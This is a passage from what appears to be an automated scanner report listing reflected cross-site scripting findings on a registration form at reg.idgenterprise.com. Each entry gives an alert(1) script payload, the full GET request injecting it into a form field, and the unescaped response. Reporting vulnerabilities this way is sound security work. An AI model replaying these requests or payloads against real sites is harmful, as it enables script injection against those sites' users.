Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:08:53 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="text" name="segment['company']" id="segment['company']" value="747ab"><script>alert(1)</script>d708f0279c035b70b,747ab">
...[SNIP]...

1.16. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27emailAddress%27%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The value of the segment%5B%27emailAddress%27%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e992"><script>alert(1)</script>5d4631f7669c09c3e was submitted in the segment%5B%27emailAddress%27%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast&segment%5B%27emailAddress%27%5D=4e992"><script>alert(1)</script>5d4631f7669c09c3e&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5D=&segment%5B%27state%27%5D=&segment%5B%27postalCode%27%5D=&segment%5B%27country%27%5D=&segment%5B%27phone%27%5D=&segment%5B%27mobile%27%5D=&segment%5B%27jobTitle%27%5D=&segment%5B%27companySize%27%5D=&segment%5B%27industry%27%5D=&segment%5B%27alert%27%5D=T&segment%5B%27optIn%27%5D=T&segment%5B%27ACD612AE-0B1C-4F42-B96F-98665CE96604%27%5D=376156&segment%5B%27ECD3F782-C70F-4AE6-80CA-CEE09570B532%27%5D=1&segment%5B%2791B9848D-F547-4A14-BF47-3C65F8145235%27%5D=7A3E05EBD67636846E364D0F613D5852&attribute%5B%27brand%27%5D=cio&attribute%5B%27leadAccelId%27%5D=aeb382d1-26b1-419c-b15b-6fa9d79185cf&attribute%5B%27referrer%27%5D=http%3A%2F%2Fresources.cio.com%2Fccd%2Fshow%2F200006520%2F00457660054375CIOLJOA2UVHLH%2F&source%5B%27pdrs%27%5D=00457660054375CIOLJOA2UVHLH HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:57:34 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:08:46 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="text" name="segment['emailAddress']" id="segment['emailAddress']" value="4e992"><script>alert(1)</script>5d4631f7669c09c3e,4e992">
...[SNIP]...

1.17. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27firstName%27%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The value of the segment%5B%27firstName%27%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30aab"><script>alert(1)</script>7c8aaa0b598b9f3e9 was submitted in the segment%5B%27firstName%27%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast&segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=30aab"><script>alert(1)</script>7c8aaa0b598b9f3e9&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5D=&segment%5B%27state%27%5D=&segment%5B%27postalCode%27%5D=&segment%5B%27country%27%5D=&segment%5B%27phone%27%5D=&segment%5B%27mobile%27%5D=&segment%5B%27jobTitle%27%5D=&segment%5B%27companySize%27%5D=&segment%5B%27industry%27%5D=&segment%5B%27alert%27%5D=T&segment%5B%27optIn%27%5D=T&segment%5B%27ACD612AE-0B1C-4F42-B96F-98665CE96604%27%5D=376156&segment%5B%27ECD3F782-C70F-4AE6-80CA-CEE09570B532%27%5D=1&segment%5B%2791B9848D-F547-4A14-BF47-3C65F8145235%27%5D=7A3E05EBD67636846E364D0F613D5852&attribute%5B%27brand%27%5D=cio&attribute%5B%27leadAccelId%27%5D=aeb382d1-26b1-419c-b15b-6fa9d79185cf&attribute%5B%27referrer%27%5D=http%3A%2F%2Fresources.cio.com%2Fccd%2Fshow%2F200006520%2F00457660054375CIOLJOA2UVHLH%2F&source%5B%27pdrs%27%5D=00457660054375CIOLJOA2UVHLH HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:57:37 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:08:48 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="text" name="segment['firstName']" id="segment['firstName']" value="30aab"><script>alert(1)</script>7c8aaa0b598b9f3e9,30aab">
...[SNIP]...

1.18. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27lastName%27%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The value of the segment%5B%27lastName%27%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac8e6"><script>alert(1)</script>209ea2e47912cbe49 was submitted in the segment%5B%27lastName%27%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast&segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=ac8e6"><script>alert(1)</script>209ea2e47912cbe49&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5D=&segment%5B%27state%27%5D=&segment%5B%27postalCode%27%5D=&segment%5B%27country%27%5D=&segment%5B%27phone%27%5D=&segment%5B%27mobile%27%5D=&segment%5B%27jobTitle%27%5D=&segment%5B%27companySize%27%5D=&segment%5B%27industry%27%5D=&segment%5B%27alert%27%5D=T&segment%5B%27optIn%27%5D=T&segment%5B%27ACD612AE-0B1C-4F42-B96F-98665CE96604%27%5D=376156&segment%5B%27ECD3F782-C70F-4AE6-80CA-CEE09570B532%27%5D=1&segment%5B%2791B9848D-F547-4A14-BF47-3C65F8145235%27%5D=7A3E05EBD67636846E364D0F613D5852&attribute%5B%27brand%27%5D=cio&attribute%5B%27leadAccelId%27%5D=aeb382d1-26b1-419c-b15b-6fa9d79185cf&attribute%5B%27referrer%27%5D=http%3A%2F%2Fresources.cio.com%2Fccd%2Fshow%2F200006520%2F00457660054375CIOLJOA2UVHLH%2F&source%5B%27pdrs%27%5D=00457660054375CIOLJOA2UVHLH HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:57:39 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:08:51 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="text" name="segment['lastName']" id="segment['lastName']" value="ac8e6"><script>alert(1)</script>209ea2e47912cbe49,ac8e6">
...[SNIP]...

1.19. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27mobile%27%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The value of the segment%5B%27mobile%27%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdca7"><script>alert(1)</script>c4f7cab3c23bef561 was submitted in the segment%5B%27mobile%27%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast&segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5D=&segment%5B%27state%27%5D=&segment%5B%27postalCode%27%5D=&segment%5B%27country%27%5D=&segment%5B%27phone%27%5D=&segment%5B%27mobile%27%5D=fdca7"><script>alert(1)</script>c4f7cab3c23bef561&segment%5B%27jobTitle%27%5D=&segment%5B%27companySize%27%5D=&segment%5B%27industry%27%5D=&segment%5B%27alert%27%5D=T&segment%5B%27optIn%27%5D=T&segment%5B%27ACD612AE-0B1C-4F42-B96F-98665CE96604%27%5D=376156&segment%5B%27ECD3F782-C70F-4AE6-80CA-CEE09570B532%27%5D=1&segment%5B%2791B9848D-F547-4A14-BF47-3C65F8145235%27%5D=7A3E05EBD67636846E364D0F613D5852&attribute%5B%27brand%27%5D=cio&attribute%5B%27leadAccelId%27%5D=aeb382d1-26b1-419c-b15b-6fa9d79185cf&attribute%5B%27referrer%27%5D=http%3A%2F%2Fresources.cio.com%2Fccd%2Fshow%2F200006520%2F00457660054375CIOLJOA2UVHLH%2F&source%5B%27pdrs%27%5D=00457660054375CIOLJOA2UVHLH HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:57:57 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:09:09 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="text" name="segment['mobile']" id="segment['mobile']" value="fdca7"><script>alert(1)</script>c4f7cab3c23bef561,fdca7">
...[SNIP]...

1.20. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27phone%27%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The value of the segment%5B%27phone%27%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f4ab"><script>alert(1)</script>e4427f4025f935482 was submitted in the segment%5B%27phone%27%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast&segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5D=&segment%5B%27state%27%5D=&segment%5B%27postalCode%27%5D=&segment%5B%27country%27%5D=&segment%5B%27phone%27%5D=4f4ab"><script>alert(1)</script>e4427f4025f935482&segment%5B%27mobile%27%5D=&segment%5B%27jobTitle%27%5D=&segment%5B%27companySize%27%5D=&segment%5B%27industry%27%5D=&segment%5B%27alert%27%5D=T&segment%5B%27optIn%27%5D=T&segment%5B%27ACD612AE-0B1C-4F42-B96F-98665CE96604%27%5D=376156&segment%5B%27ECD3F782-C70F-4AE6-80CA-CEE09570B532%27%5D=1&segment%5B%2791B9848D-F547-4A14-BF47-3C65F8145235%27%5D=7A3E05EBD67636846E364D0F613D5852&attribute%5B%27brand%27%5D=cio&attribute%5B%27leadAccelId%27%5D=aeb382d1-26b1-419c-b15b-6fa9d79185cf&attribute%5B%27referrer%27%5D=http%3A%2F%2Fresources.cio.com%2Fccd%2Fshow%2F200006520%2F00457660054375CIOLJOA2UVHLH%2F&source%5B%27pdrs%27%5D=00457660054375CIOLJOA2UVHLH HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:57:55 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:09:06 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="text" name="segment['phone']" id="segment['phone']" value="4f4ab"><script>alert(1)</script>e4427f4025f935482,4f4ab">
...[SNIP]...

1.21. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27postalCode%27%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The value of the segment%5B%27postalCode%27%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a0e1"><script>alert(1)</script>1c83c959f4cecb38e was submitted in the segment%5B%27postalCode%27%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast&segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5D=&segment%5B%27state%27%5D=&segment%5B%27postalCode%27%5D=4a0e1"><script>alert(1)</script>1c83c959f4cecb38e&segment%5B%27country%27%5D=&segment%5B%27phone%27%5D=&segment%5B%27mobile%27%5D=&segment%5B%27jobTitle%27%5D=&segment%5B%27companySize%27%5D=&segment%5B%27industry%27%5D=&segment%5B%27alert%27%5D=T&segment%5B%27optIn%27%5D=T&segment%5B%27ACD612AE-0B1C-4F42-B96F-98665CE96604%27%5D=376156&segment%5B%27ECD3F782-C70F-4AE6-80CA-CEE09570B532%27%5D=1&segment%5B%2791B9848D-F547-4A14-BF47-3C65F8145235%27%5D=7A3E05EBD67636846E364D0F613D5852&attribute%5B%27brand%27%5D=cio&attribute%5B%27leadAccelId%27%5D=aeb382d1-26b1-419c-b15b-6fa9d79185cf&attribute%5B%27referrer%27%5D=http%3A%2F%2Fresources.cio.com%2Fccd%2Fshow%2F200006520%2F00457660054375CIOLJOA2UVHLH%2F&source%5B%27pdrs%27%5D=00457660054375CIOLJOA2UVHLH HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:57:52 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:09:04 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="text" name="segment['postalCode']" id="segment['postalCode']" value="4a0e1"><script>alert(1)</script>1c83c959f4cecb38e,4a0e1">
...[SNIP]...

1.22. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [source%5B%27pdrs%27%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The value of the source%5B%27pdrs%27%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29750"><script>alert(1)</script>15966224188114016 was submitted in the source%5B%27pdrs%27%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast&segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5D=&segment%5B%27state%27%5D=&segment%5B%27postalCode%27%5D=&segment%5B%27country%27%5D=&segment%5B%27phone%27%5D=&segment%5B%27mobile%27%5D=&segment%5B%27jobTitle%27%5D=&segment%5B%27companySize%27%5D=&segment%5B%27industry%27%5D=&segment%5B%27alert%27%5D=T&segment%5B%27optIn%27%5D=T&segment%5B%27ACD612AE-0B1C-4F42-B96F-98665CE96604%27%5D=376156&segment%5B%27ECD3F782-C70F-4AE6-80CA-CEE09570B532%27%5D=1&segment%5B%2791B9848D-F547-4A14-BF47-3C65F8145235%27%5D=7A3E05EBD67636846E364D0F613D5852&attribute%5B%27brand%27%5D=cio&attribute%5B%27leadAccelId%27%5D=aeb382d1-26b1-419c-b15b-6fa9d79185cf&attribute%5B%27referrer%27%5D=http%3A%2F%2Fresources.cio.com%2Fccd%2Fshow%2F200006520%2F00457660054375CIOLJOA2UVHLH%2F&source%5B%27pdrs%27%5D=00457660054375CIOLJOA2UVHLH29750"><script>alert(1)</script>15966224188114016 HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
